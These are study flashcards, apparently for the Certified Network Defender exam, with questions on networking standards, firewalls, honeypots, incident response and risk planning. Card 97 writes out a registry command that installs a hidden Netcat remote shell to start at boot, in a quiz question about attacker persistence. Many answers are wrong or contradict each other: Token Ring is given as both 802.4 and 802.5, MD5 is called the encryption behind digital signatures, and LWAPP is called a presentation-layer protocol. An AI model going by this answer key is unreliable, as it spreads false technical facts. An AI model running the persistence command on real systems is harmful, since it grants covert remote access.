Study CND Flashcards

1
Q

What is the bit size of the Next Header field in the IPv6 header format?

A

8 Bits

2
Q
Which of the following is a presentation layer protocol?
A. TCP
B. RPC
C. BGP
D. LWAPP
A

Answer: D

LWAPP

3
Q

What IEEE standard is Fast Basic Service Set Transition? And what does it do?

A

802.11r is the standard to permit continuous connectivity aboard wireless devices in motion, with fast and secure handoffs from one base station to another, managed in a seamless manner.

4
Q

__________ is a congestion control mechanism that is designed for unicast flows operating in an Internet environment and competing with TCP traffic?

A

TCP Friendly Rate Control

5
Q

What is the IEEE-SA for wireless personal area networks?

A

802.15

6
Q

Which layer performs routing of IP datagrams?

A

Internet Layer

7
Q
Which of the following layers performs routing of IP datagrams?
A. Transport layer
B. Link layer
C. Application layer
D. Internet layer
A

Internet layer

Answer: D

8
Q
Which of the following standards defines Logical Link Control (LLC)?
A. 802.2
B. 802.3
C. 802.5
D. 802.4
A

802.2

Answer: A

9
Q
Which of the following protocols supports source-specific multicast (SSM)?
A. DHCP
B. ARP
C. DNS
D. BGMP
A

BGMP

Answer: D

10
Q
Token Ring is standardized by which of the following IEEE standards?
A. 802.2
B. 802.4
C. 802.3
D. 802.1
A

802.4 is the standard for Token Ring

Answer: B

11
Q
Which of the following is an example of a network providing DQDB access methods?
A. IEEE 802.3
B. IEEE 802.2
C. IEEE 802.4
D. IEEE 802.6
A

802.6 - Local and Metropolitan Area Networks: Distributed Queue Dual Bus (DQDB) Subnetwork of a Metropolitan Area Network (MAN)

Answer: D

12
Q
Which of the following IEEE standards defines the demand priority access method?
A. 802.15
B. 802.3
C. 802.12
D. 802.11
A

802.12

Answer: C

Has to do with 100 Mbit Wifi on demand access. Probably not on the test. MAN

13
Q
Which of the following IEEE standards adds QoS features and multimedia support?
A. 802.11b
B. 802.11e
C. 802.5
D. 802.11a
A

802.11e

Answer: B

14
Q

Which of the following OSI layers is sometimes called the syntax layer?

A

Presentation layer

15
Q
Which of the following IEEE standards defines the token passing ring topology?
A. 802.4
B. 802.5
C. 802.3
D. 802.7
A

802.5

Answer: B

16
Q
Which of the following IEEE standards defines a physical bus topology?
A. 802.4
B. 802.5
C. 802.6
D. 802.3
A

802.4

Answer: A

17
Q
Which of the following fields in the IPv6 header replaces the TTL field in the IPv4 header?
A. Next header
B. Traffic class
C. Hop limit
D. Version
A

Hop Limit

Answer: C

18
Q
What is the response of an Xmas scan if a port is either open or filtered?
A. RST
B. No response
C. FIN
D. PUSH
A

No response

Answer: B

19
Q

CSMA/CD is specified in which IEEE standard?

A

802.3

20
Q

Which of the following protocols sends a jam signal when a collision is detected?

A

CSMA/CD

21
Q
Which of the following protocols is used in wireless networks?
A. CSMA
B. CSMA/CD
C. ALOHA
D. CSMA/CA
A

CSMA/CA

Answer: D

22
Q

TCP SYN scanning is also known as

A

half-open scanning

23
Q

You are a professional Computer Hacking forensic investigator. You have been called to collect evidence of buffer overflow and cookie snooping attacks. Which of the following logs will you review to accomplish the task?
A. Program logs
B. Web server logs
C. Event logs
D. System logs

A

A. Program logs

C. Event logs
D. System logs

Answer: D, C, and A

24
Q

Jason diagnoses the internals of his computer and observes that some changes have been made in Sam’s computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.
A. Reg.exe
B. EventCombMT
C. Regedit.exe
D. Resplendent registrar

A

A. Reg.exe

C. Regedit.exe
D. Resplendent registrar

25
The Distance Vector Multicast Routing Protocol (DVMRP) is used to ...
share information between routers to transport IP Multicast packets among networks.
26
______________ is an enumeration technique used to glean information about computer systems on a network and the services running on its open ports.
Banner Grabbing
27
The Data Link Switching Client Access Protocol (DCAP) is an application layer protocol that is used between workstations and routers for
transporting SNA/NetBIOS traffic over TCP sessions.
28
Honeynet is a prime example of
a high-interaction honeypot.
29
Two or more honeypots on a network form a
honeynet.
30
Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action? A. Analysis of Threats B. Application of Appropriate OPSEC Measures C. Identification of Critical Information D. Analysis of Vulnerabilities E. Assessment of Risk
D. Analysis of Vulnerabilities. Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary's intelligence collection capabilities identified in the previous action.
31
Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)? A. BGMP B. DVMRP C. OSPF D. EIGRP
BGMP. BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM). In order to support "any-source multicast" (ASM), BGMP builds shared trees for active multicast groups. This allows domains to build source-specific, inter-domain, distribution branches where needed. BGMP uses TCP as its transport protocol, which helps in eliminating the need to implement message fragmentation, retransmission, acknowledgement, and sequencing.
32
What did the 802.11e enhancement to 802.a and 802.b provide?
QoS prioritization of voice, data, and video transmissions
33
Which of the OSI seven layers establishes, manages, and terminates connections between local and remote applications?
Session
34
Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. Choose three. A. Function point analysis B. Program Evaluation Review Technique (PERT) C. Expert judgment D. Delphi technique
D. Delphi technique C. Expert judgment A. Function point analysis
35
Which of the following IP class addresses are not allotted to hosts?
Class D (224-239), reserved for multicasting; Class E (240-255), experimental
36
Which of the following IEEE standards provides specifications for wireless ATM systems?
802.11a
37
Which of the following is the type of documented business rule for protecting information and the systems which store and process the information? A. Information protection policy B. Information protection document C. Information storage policy D. Information security policy
Information security policy
38
Which of the following UTP cables supports transmission up to 20MHz? A. Category 2 B. Category 5e C. Category 4 D. Category 1
Category 4
39
Which of the following is also known as slag code? A. Trojan B. Logic bomb C. Worm D. IRC bot
Logic Bomb
40
Which of the following is susceptible to a birthday attack? A. Authentication B. Integrity C. Authorization D. Digital signature
Digital Signature
41
Which of the following wireless networks provides connectivity over distance up to 20 feet? A. WMAN B. WPAN C. WLAN D. WWAN
WPAN
42
Which of the following networks interconnects devices centered on an individual person's workspace? A. WLAN B. WPAN C. WWAN D. WMAN
WPAN
43
Which of the following is a symmetric 64-bit block cipher that can support key lengths up to 448 bits? A. HAVAL B. BLOWFISH C. IDEA D. XOR
Blowfish
44
Which of the following protocols is used to exchange encrypted EDI messages via email? A. S/MIME B. MIME C. HTTP D. HTTPS
S/MIME
45
Which of the following are provided by digital signatures? A. Identification and validation B. Authentication and identification C. Integrity and validation D. Security and integrity
Authentication and Validation
46
Which of the following is a passive attack? A. Unauthorized access B. Traffic analysis C. Replay attack D. Session hijacking Answer: B
Traffic Analysis
47
Which of the following is a malicious program that looks like a normal program? A. Impersonation B. Worm C. Virus D. Trojan horse
Trojan Horse
48
Which of the following is an IPSec protocol that can be used alone or in combination with Authentication Header (AH)? A. L2TP B. PPTP C. ESP D. PPP
ESP (Encapsulating Security Payload protocol)
49
Which of the following attacks combines dictionary and brute force attacks? A. Replay attack B. Man-in-the-middle attack C. Hybrid attack D. Phishing attack
Hybrid Attack
50
Which of the following attacks comes under the category of an active attack? A. Replay attack B. Wireless footprinting C. Passive Eavesdropping D. Traffic analysis
Replay Attack
51
Which of the following encryption techniques do digital signatures use? A. MD5 B. RSA C. Blowfish D. IDEA
MD5
52
Which of the following header fields in TCP/IP protocols involves Ping of Death attack? A. SMTP header field B. TCP header field C. IP header field D. UDP header field
TCP Header Field
53
Which of the following modems offers wireless communication under water? A. Controllerless modem B. Short haul modem C. Acoustic modem D. Optical modem
Acoustic modem
54
Which of the following protocols is used by the Remote Authentication Dial In User Service (RADIUS) client/server protocol for data transmission? A. DCCP B. FTP C. FCP D. UDP
UDP
55
Which of the following applications is used for the statistical analysis and reporting of the log files? A. Sawmill B. Sniffer C. Snort D. jplag
Sawmill
56
Which of the following is a Cisco product that performs VPN and firewall functions? A. Circuit-Level Gateway B. PIX Firewall C. IP Packet Filtering Firewall D. Application Level Firewall
PIX Firewall
57
Which of the following is also known as stateful firewall? A. PIX firewall B. Stateless firewall C. DMZ D. Dynamic packet-filtering firewall
Dynamic packet-filtering firewall
58
Which of the following is a centralized collection of honeypots and analysis tools? A. Production honeypot B. Honeynet C. Research honeypot D. Honeyfarm
Honeyfarm
59
Which of the following routing metrics is the sum of the costs associated with each link traversed? A. Routing delay B. Communication cost C. Bandwidth D. Path length
Path Length
60
Which of the following honeypots is a useful little burglar alarm? A. Backofficer friendly B. Specter C. Honeynet D. Honeyd
Backofficer friendly
61
What is the location of honeypot on a network? A. Honeyfarm B. Honeynet C. Hub D. DMZ
DMZ
62
Which of the following is an open source implementation of the syslog protocol for Unix? A. syslog-os B. syslog Unix C. syslog-ng D. Unix-syslog
syslog-ng
63
Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication? A. IP B. L2TP C. PPP D. DHCP
L2TP
64
Which of the following sets of incident response practices is recommended by the CERT/CC? A. Prepare, notify, and follow up B. Notify, handle, and follow up C. Prepare, handle, and notify D. Prepare, handle, and follow up
Prepare, handle, and follow up
65
Which of the following tools scans the network systems for well-known and often exploited vulnerabilities? A. Nessus B. SAINT C. SATAN D. HPing
SATAN
66
Which of the following tools examines a system for a number of known weaknesses and alerts the administrator? A. Nessus B. COPS C. SATAN D. SAINT
COPS
67
Which of the following is the full form of SAINT? A. System Automated Integrated Network Tool B. Security Admin Integrated Network Tool C. System Admin Integrated Network Tool D. System Administrators Integrated Network Tool
System Administrators Integrated Network Tool
68
Which of the following is a type of VPN that involves a single VPN gateway? A. Remote-access VPN B. Extranet-based VPN C. PPTP VPN D. Intranet-based VPN
Extranet-based VPN
69
Which of the following is a free security-auditing tool for Linux? A. SAINT B. SATAN C. Nessus D. HPing
Nessus
70
Which of the following types of RAID is also known as disk striping? A. RAID 0 B. RAID 2 C. RAID 1 D. RAID 3
RAID 0
71
Which of the following is a process of transformation where the old system can no longer be maintained? A. Disaster B. Risk C. Threat D. Crisis
Crisis
72
Which of the following phases is the first step towards creating a business continuity plan? A. Business Impact Assessment B. Scope and Plan Initiation C. Business Continuity Plan Development D. Plan Approval and Implementation
Scope and Plan Initiation
73
Which of the following types of RAID offers no protection for the parity disk? A. RAID 2 B. RAID 1 C. RAID 5 D. RAID 3
RAID 3
74
Which of the following processes helps the business units to understand the impact of a disruptive event? A. Plan approval and implementation B. Business continuity plan development C. Scope and plan initiation D. Business impact assessment
Business impact assessment
75
Which of the following is a network analysis tool that sends packets with nontraditional IP stack parameters? A. Nessus B. COPS C. SAINT D. HPing
HPING
76
Which of the following protocols is a method of implementing virtual private networks? A. OSPF B. PPTP C. IRDP D. DHCP
PPTP
77
Which of the following attacks are computer threats that try to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer? Each correct answer represents a complete solution. Choose all that apply. A. Buffer overflow B. Zero-day C. Spoofing D. Zero-hour
Zero Day and Zero Hour
78
Which of the following is a service discovery protocol that allows computers and other devices to find services in a local area network without prior configuration? A. NTP B. SLP C. NNTP D. DCAP
SLP (Service Location Protocol)
79
In L2TP ______________ tunnel mode, the ISP must support L2TP, whereas in L2TP tunnel mode, the ISP does not need to support L2TP.
compulsory
80
Which of the following tools examines a system for a number of known weaknesses and alerts the administrator? SAINT; Nessus; SATAN; COPS
COPS
81
Which of the following routing metrics refers to the length of time that is required to move a packet from source to destination through the internetwork? Bandwidth; Path length; Routing Delay; Load
Routing Delay
82
Your company is outgrowing its current facility and plans to relocate within the next year. You need to provide management with guidance on selecting an appropriate new location. You are compiling a list of location considerations. Which is NOT a consideration? proximity to roads; neighboring buildings; emergency exits; utility systems
emergency exits
83
You are designing the site-to-site VPN topology. You want to connect all branches to the main office while preventing direct connections between branch offices. Which topology should you choose? hub and spoke; star; mesh; ring
star
84
You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company's network. Which type of Internet access policy is currently implemented? Paranoid; Prudent; Permissive; Promiscuous
Promiscuous
85
Recently, an attacker was able to connect to a wireless access point as a client and eavesdrop on the traffic to obtain address information. Which type of wireless attack has occurred? ad-hoc connection attack; AP MAC spoofing; misconfigured access point attack; evil twin attack
AP MAC spoofing
86
In the process of evaluating the QoS features of VPN products, you become concerned with the ratio of data packets sent versus all packets. What is this called? packet loss; Delay; Jitter; Goodput
Goodput
87
You are using Nmap to perform a vulnerability assessment. Which of the following procedures would help to create a map of the network? ping sweep; Service discovery; port scan; OS fingerprinting
ping sweep
88
Which of the following third party encryption tools can perform on the fly encryption (OTFE)? Open Puff; AxCrypt; Wireshark; Veracrypt
Veracrypt
89
You would like to connect your sniffer to a switch and capture all traffic going through the switch. Which of the following features could you use? VTP 802.1q DAI RAP STP SPAN
RAP SPAN
90
During which stage of the IH&R process is a vulnerability analysis performed? Eradication and Recover; Post-Incident Activities; Forensic Investigation; Containment
Eradication and Recover
91
With which of the following flag sets does the Xmas tree scan send a TCP frame to a remote device? Response: RST PUSH FIN URG
PUSH FIN URG
92
Which of the following is the logical entity that enables programming code or software to operate in a virtualization solution? Response: virtual machine; hypervisor; execution environment; host operating system
execution environment
93
What is the second phase in the vulnerability management process? Remediation; Asset prioritization; Verification; Assessment
Asset prioritization
94
Which of the following are the responsibilities of the disaster recovery team? Each correct answer represents a complete solution. Choose all that apply. To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts; To initiate the execution of the disaster recovery procedures; To monitor the execution of the disaster recovery plan and assess the results; To notify management, affected personnel, and third parties about the disaster
To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts; To initiate the execution of the disaster recovery procedures; To monitor the execution of the disaster recovery plan and assess the results; To notify management, affected personnel, and third parties about the disaster
95
You are deploying a network IDS, and your main concern is to monitor surges in traffic that may indicate a DoS attack. Where should you place the sensors? in the DMZ; on major backbones; on critical subnets; behind the external firewall
on major backbones
96
Which wireless IPS will raise its risk indicator to 100% if an AP were discovered to be running with no encryption?
AirMobile Server
97
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Response: You want to put Netcat in the stealth mode. You want to set the Netcat to execute command any time. You want to perform banner grabbing. You want to add the Netcat command to the Windows registry.
You want to put Netcat in the stealth mode. You want to set the Netcat to execute command any time. You want to add the Netcat command to the Windows registry.
98
Management is concerned that your Linux email server can become the victim of a DoS attack. Which of the following hardening recommendations will help reduce this possibility? Use DNSBL servers. Activate SPF. Configure reverse DNS lookup. Limit the number of connections.
Limit the number of connections.
99
Management is concerned that an attacker will be able to access the /etc/shadow password file on a Linux server. When the Linux server was installed, the default permissions for this file were used. For this reason, you are not concerned. What are the default permissions for this file? 500; 400; 600; 700
400
100
You may need to know how to change permissions in numeric code in Linux, so to do this you use numbers instead of “r”, “w”, or “x”. What are the eight permission combinations of Owner, Group, User? 0 = No Permission; 1 = Execute; 2 = Write; 4 = Read
Permission numbers are:
```
0 = ---
1 = --x
2 = -w-
3 = -wx
4 = r--
5 = r-x
6 = rw-
7 = rwx
```
Example: chmod 744
101
Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems? IGMP; EGP; OSPF; ICMP
OSPF
102
Which of the following functions becomes possible when using quantitative risk analysis? risk elimination; cost/benefit analysis; risk prioritization; risk identification
Cost/Benefit analysis
103
Which of the following standards does a cloud service provider have to comply with, to protect the privacy of its customer’s personal information? ISO/IEC 27020; ISO/IEC 27021; ISO/IEC 27018; ISO/IEC 27019
ISO/IEC 27018
104
Which group in ISO/IEC 27001 includes communications security controls? Response: A.6; A.15; A.5; A.13
A.13
105
Which wireless discovery tool uses the Windows command netsh wlan show networks mode=bssid to get wireless information? NetStumbler; Vistumbler; InSSIDer; NetSurveyor
Vistumbler
106
Business Continuity Plan
provides measures for sustaining essential business operations while recovering from significant disruption
107
Business Recovery Plan
provides measures for recovering business operations immediately following a disaster
108
Continuity of Operation plan
provides measures and capabilities to maintain organizational essential, strategic functions at an alternate site for up to 30 days
109
It provides measures and capabilities for recovering a major application or general support system.
Contingency Plan
110
It provides measures for disseminating status report to personnel and the public
Crisis Communication Plan
111
It provides detailed measures to facilitate recovery of capabilities at an alternate site.
Disaster recovery plan
112
What are the three layers of computer network defense (CND)? people, assets, and technology; assets, operations, and technology; people, operations, and technology; people, operations, and assets
people, operations, and technology
113
In which phase of the NIST Risk Management framework are security controls tailored to the needs of the organization? Authorize; Select; Categorize; Monitor
Select
114
Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another? BGP; ICMP; SNMP; IGMP
ICMP
115
You are assessing security needs for several hosts according to their purpose in the network. Which of the following factors would NOT affect security considerations for the hosts? network services provided by the host; category of information stored on the host; operating system of the host; security requirements needed for information
operating system of the host
116
Which sniffing tool is a command-line tool? Dsniff; Capsa; Tcpdump; ColaSoft
tcpdump
117
Sally needs to encrypt a document so that only Bob can decrypt it. What key should she use for this? Bob's public key; Sally's public key; Sally's private key; Bob's private key
Bob's Public Key
118
Which of the following is true of security policies and baselines? Security policies define the structure of the baseline. Baselines define the structure of the security policy. Policies are specific to the operating system. Baselines are not specific to the operating system.
Baselines define the structure of the security policy
119
Which of the following is NOT an IDS system? Peek and Spy; Snort; Vanguard Enforcer; KFSensor
KFSensor (Windows IPS)
120
Identify the firewall technology that monitors the TCP handshake between the packets to determine whether a requested session is legitimate. Packet Filtering Firewall; Circuit Level Gateway; Stateful Multilayer Inspection; Network Address Translation
Circuit Level Gateway
121
During IH&R, the ____________ and containment processes can run at the same time. Solution: forensic analysis or forensic investigation. Determine whether the given solution is correct. Response: Correct or Incorrect
Correct
122
During which phase of the vulnerability management process are rogue devices typically discovered? Asset Prioritization; Discovery; Reporting; Assessment
Discovery
123
Which of the following does NOT occur during the Post-incident Activity stage of IH&R? Perform a damage assessment and document incident costs. Update the incident handling policy. Return the affected system to normal operation.
Return the affected system to normal operation.
124
In which of the following levels of vulnerability management does scanning occur? Assessment; Discovery; Asset prioritization; Remediation
Assessment
125
At what layer of the OSI model do packet-filtering firewalls operate? Layers 2 and 3; Layers 4 and 5; Layers 5 and 6; Layers 3 and 4
Layers 3 and 4
126
Which of the following is a standard-based protocol that provides the highest level of VPN security? PPP; IPSec; L2TP; IP
IPSec
127
Which of the following forensic investigation roles examines the evidence acquired and determines what is useful to the investigation? incident analyser; expert witness; evidence manager; evidence investigator
evidence investigator
128
Which of the following should the first responder document prior to escalating an incident? handling procedures; data about the affected system; containment actions; IRT contact information
data about the affected system
129
Your sniffer just detected one device sending another a packet with the SYN flag set in the TCP header. What flags would you expect to be set in the packet the receiving device sends back to the sender? SYN; ACK; SYN and ACK; RST
SYN and ACK
130
Which tool ensures integrity of system files through the use of a cron job? Trustwave; Tripwire; Code Green Networks TrueDLP; McAfee Total Protection for Data Loss
Tripwire
131
Which policy defines the data sensitivity labels and the guidelines for processing, storing, and transmitting sensitive data? acceptable use policy; network connection policy; information protection policy; information system security policy
information protection policy
132
Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall? Each correct answer represents a complete solution. Choose all that apply. Dynamic packet-filtering; Stateful; Proxy server; Circuit-level gateway
Dynamic packet-filtering and Stateful
133
The Tripwire tool is used for what function? file integrity verification; intrusion detection; data loss prevention; log collection
file integrity verification
134
Which phase of vulnerability management deals with the actions for patching the discovered vulnerabilities? Verification; Mitigation; Remediation; Assessment
Remediation
135
Which of the following is a mandatory password-based and key-exchange authentication protocol? DH-CHAP; PPP; CHAP; VRRP
DH-CHAP
136
You use the following filter in Wireshark: (tcp.flags==0x02) && (tcp.window_size <1025) What type of traffic is the filter trying to locate? TCP ACK scans; TCP SYN scans; OS fingerprinting; TCP SYN ACK packets
OS fingerprinting
137
Which of the following IDS tools performs packet filtering using Berkeley Packet Filtering commands? AIDE; SNARE; Vanguard Enforcer; Snort
Snort
138
Your company recently implemented an internal public key infrastructure (PKI). Because you need to ensure that all of the PKI components are secure, you are currently researching the vulnerabilities of the entity that signs the certificates. Which entity are you examining? a principal; a verifier; an issuer; a subject
an issuer
139
Which of the following is NOT a suspicious TCP packet? one with only the SYN flag set and data; one with the SYN and FIN flags set; one with the destination port of zero; one with only the SYN flag set and no data
one with only the SYN flag set and no data
140
Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the remote system? Nmap; SuperScan; Netscan; Hping
SuperScan
141
Your company decides to implement a new wireless network for employees who use mobile devices. You have been asked to determine which wireless deployment will provide the fastest throughput. Which of the following should you recommend? 802.11g; 802.11ac; 802.11n; 802.11ad
802.11ad
142
Which Wi-Fi discovery tool is built specifically for the Apple MAC OS? Aircheck Wi-Fi tester; Xirrus Wi-Fi Inspector; AirRadar 2; Wellenreiter
AirRadar 2
143
Your company implements an authentication mechanism on their website whereby customers need to enter the hidden letters in a distorted image to confirm their identity. Which type of knowledge factor authentication is being used? PIN; challenge response; Passphrase; security question
Challenge Response
144
What is the third step in the patch management process? Assess; Deploy; Detect; Acquire
Acquire
145
Which of the following can only be done with an asymmetric algorithm? data integrity; digital signature; generate hash values; data encryption
digital signature
146
Which of the following statements are NOT true about the FAT16 file system? Each correct answer represents a complete solution. Choose all that apply. It does not support file-level security. It supports file-level compression. It works well with large disks because the cluster size increases as the disk partition size increases. It supports the Linux operating system.
It supports file-level compression. It works well with large disks because the cluster size increases as the disk partition size increases.
147
During which stage of the IH&R process is a vulnerability analysis performed? Post-Incident Activities; Eradication and Recover; Forensic Investigation; Containment
Eradication and Recover
148
Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks? Response: LWAPP; DVMRP; RSVP; RPC
DVMRP (Distance Vector Multicast Routing Protocol)
149
Which of the following is true of content-based signatures? Response: Signatures are in packet payloads. Signatures are in packet headers. Packet analysis is enough to detect signatures. Multiple packet analysis is required.
Signatures are in packet payloads.
150
Which computer network defense (CND) approach examines the root cause or reasons for network attacks? detective approach; retrospective approach; preventive approach; reactive approach
retrospective approach
151
Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password? Aircrack; Ettercap; BackTrack; AirSnort
Ettercap
152
You are reviewing your company's application development policies. Which of the following should NOT be part of this? Use standard application configuration baselines during development. Implement secure coding review. Ensure only authorized personnel can install software on all hosts. Use standard secure coding practices and principles during development.
Use standard application configuration baselines during development.
153
You need to test the strength of the WPA PSK password used in your WLAN. Which tool could you use for this? Net Surveyor; NetStumbler; Vistumbler; Wireless Security Auditor
Wireless Security Auditor
154
You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company's network. Which type of Internet access policy is currently implemented? Permissive; Promiscuous; Paranoid; Prudent
Promiscuous
155
Which of the following protocols uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets? PPTP; SSTP; ESP; LWAPP
PPTP
156
Which of the following does NOT affect the severity of an incident? service criticality; incident impact; incident duration; information confidentiality
information confidentiality
157
Which of the following sniffers can operate on multi-network cards, such as ISDN and ADSL? Dsniff; Capsa; ColaSoft Packet Sniffer; Colasoft Network Sniffer
ColaSoft Packet Sniffer
158
In which of the following transmission modes is communication uni-directional? Full-duplex mode; Half-duplex mode; Root mode; Simplex mode
Simplex Mode
159
You suspect an attacker recently performed a UDP scan of the network. You would like to look for traffic that would verify this. How should you set the filter in Wireshark? icmp.type==3 and ICMP code==3; tcp.flags==0x003; udp.dtspport==7; icmp.type==8
icmp.type==3 and ICMP code==3
160
Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies? Switch; Gateway; Bridge; Router
Gateway
161
Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems? IEEE; CCITT; ICANN; NIST
CCITT
162
At which level of virtualization does SAN technology operate? file system; storage device; Fabric; server
Fabric
163
Which of the following recovery plans includes specific strategies and actions to deal with specific variances to assumptions resulting in a particular security problem, emergency, or state of affairs? Contingency plan; Continuity of Operations Plan; Business continuity plan; Disaster recovery plan
Contingency plan
164
In which of the risk management phases is the context in which the risk exists determined? Risk treatment; Risk assessment; Risk monitoring and review; Risk identification
Risk Identification